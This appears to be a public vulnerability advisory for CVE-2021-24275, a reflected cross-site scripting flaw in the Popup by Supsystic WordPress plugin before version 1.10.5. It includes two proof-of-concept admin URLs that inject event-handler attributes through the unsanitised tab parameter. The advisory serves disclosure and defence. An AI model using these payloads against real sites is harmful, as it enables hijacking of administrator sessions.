Popup by Supsystic < 1.10.5 – Reflected Cross-Site scripting (XSS) | CVE 2021-24275 | Plugin Vulnerabilities

Description

The plugin did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue

Proof of Concept

/wp-admin/admin.php?page=popup-wp-supsystic&tab="onmouseover=alert(1)//

/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//

Affects Plugins

popup-by-supsystic

Fixed in 1.10.5

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

0xB9

Submitter

0xB9

Submitter twitter

Verified

Yes

WPVDB ID

efdc76e0-c14a-4baf-af70-9d381107308f

Timeline

Publicly Published

2021-04-19 (about 3 years ago)

Added

2021-04-19 (about 3 years ago)

Last Updated

2021-04-20 (about 3 years ago)

Other

Published

Title

Published

2024-03-18

Title

WPB Show Core < 2.6 - Reflected XSS

Published

2022-12-27

Title

Easy Social Feed – Social Photos Gallery – Post Feed – Like Box < 6.4.0 - Contributor+ Stored XSS

Published

2024-04-30

Title

Eleblog – Elementor Blog And Magazine Addons <= 1.8 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-01-03

Title

CformsII < 15.0.7 - Admin+ Stored XSS

Published

2014-12-03

Title

WP Statistics <= 8.4 - Unauthenticated Referer Header Stored XSS